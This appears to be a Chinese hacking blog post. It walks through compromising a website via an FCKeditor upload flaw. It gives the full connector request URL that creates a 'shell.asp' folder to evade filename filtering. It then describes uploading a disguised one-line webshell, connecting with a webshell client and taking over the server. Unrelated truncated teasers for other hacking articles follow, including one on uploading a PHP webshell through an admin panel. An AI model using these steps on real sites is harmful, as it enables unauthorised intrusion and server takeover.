找了个添加新闻的地方,点击上传图片→浏览服务器,如下图:
然后新建一个文件夹,命名为 qxz.asp 如下图:
但是被自动命名变成了 qxz_asp 如下图:
下面我们就要用到绕过代码来突破了,代码如下:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
把上面的代码加在网站链接后面,按下回车。如:http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
OK成功
然后关掉此页面,再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹
然后把一句话改名为 yjh.asp;.jpg 上传一句话马到此文件夹中。
OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_asp;.jpg
最后上大马,经过一翻提权战斗,终于拿下了这台服务器,天色不早了,提权过程就不写了。
在《黑客基础术语:什么是命令行和环境变量?》本文里我讲过什么叫SHELL?大伙儿能够温故一下。本文章内容是这一系列产品的第五篇,主要讲一下什么是黑客里的互动式SHELL及其在非互动式SHELL里怎样...
我已经写过许多网络黑客方法了,假如你认真学,也可以把握一些了。可是有的新手便会问了,我怎样发觉网址有了你常说的系统漏洞,我怎样应用这种方法?这一就需要采用扫描枪了。 扫描枪是一类自动识...
其实爆破服务器很简单的,也是必学的。 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启。对...
什么叫MBSA? Microsoft Baseline Security Analyzer或一般 称之为MBSA的便于应用的专用工具,可依据Microsoft安全系数提议协助明确电子计算机的安全性情...
很久没有人用HackBar软件了,今日用火狐浏览器登录上来,按F12键调成HackBar,发觉竟然做以下提醒: Please enter your license to use hackbar. G...
方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images...